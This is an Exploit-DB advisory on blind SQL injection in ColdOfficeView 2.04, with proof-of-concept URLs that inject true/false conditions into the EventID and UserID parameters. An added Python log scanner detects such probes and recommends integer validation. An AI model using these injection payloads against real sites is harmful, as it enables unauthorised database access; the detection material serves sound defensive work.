- 18 Dec 2022
- EDB-ID: 14934
- EDB verification: Passed
- Author: MR_ME
- Vulnerability type: WEBAPPS
- Platform: WINDOWS
- CVE: null
- Publication date: 2010-09-07
ColdOfficeView 2.04 - Multiple Blind SQL Injections
Code:
# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)
PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false
2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false
- Source: www.exploit-db.com
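For defenders reviewing web logs, the following added example (not part of the original advisory or of ColdOfficeView) flags clients that send non-integer values in the two numeric parameters the advisory names. The common-log-format layout, the `/app/` path and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Integer-only parameters named in the advisory, keyed by lower-cased fuseaction.
NUMERIC_PARAMS = {"vieweventdetails": "EventID", "editprofile": "UserID"}

# Client address and request target from a common-log-format line (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed sample lines: documentation addresses, hypothetical /app/ path.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2010:10:00:01 +0000] "GET /app/index.cfm?fuseaction=ViewEventDetails&EventID=1%20and%201=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [07/Sep/2010:10:00:02 +0000] "GET /app/index.cfm?fuseaction=ViewEventDetails&EventID=1%20and%201=2 HTTP/1.1" 200 812',
    '198.51.100.7 - - [07/Sep/2010:10:01:00 +0000] "GET /app/index.cfm?fuseaction=ViewEventDetails&EventID=12 HTTP/1.1" 200 5090',
    '198.51.100.7 - - [07/Sep/2010:10:01:05 +0000] "GET /app/index.cfm?fuseaction=EditProfile&UserID=3 HTTP/1.1" 200 4000',
]

def non_integer_value(target):
    """Return (param, decoded value) when a numeric parameter is not all digits."""
    query = defaultdict(list)
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        query[name.lower()].append(value)  # CFML URL variable names ignore case
    action = (query.get("fuseaction") or [""])[0].lower()
    param = NUMERIC_PARAMS.get(action)
    if param is None:
        return None
    for value in query.get(param.lower(), []):
        if not re.fullmatch(r"[0-9]+", value):
            return param, value
    return None

def find_probing(lines, threshold=2):
    """Map client -> sorted (param, value) hits for clients with >= threshold distinct hits."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed log format
        found = non_integer_value(m.group(2))
        if found:
            hits[m.group(1)].add(found)
    return {ip: sorted(v) for ip, v in hits.items() if len(v) >= threshold}

if __name__ == "__main__":
    for ip, found in find_probing(SAMPLE_LOG).items():
        print(ip, found)
```

The same all-digits check, applied server-side before the value reaches the query, rejects both request forms shown in the advisory.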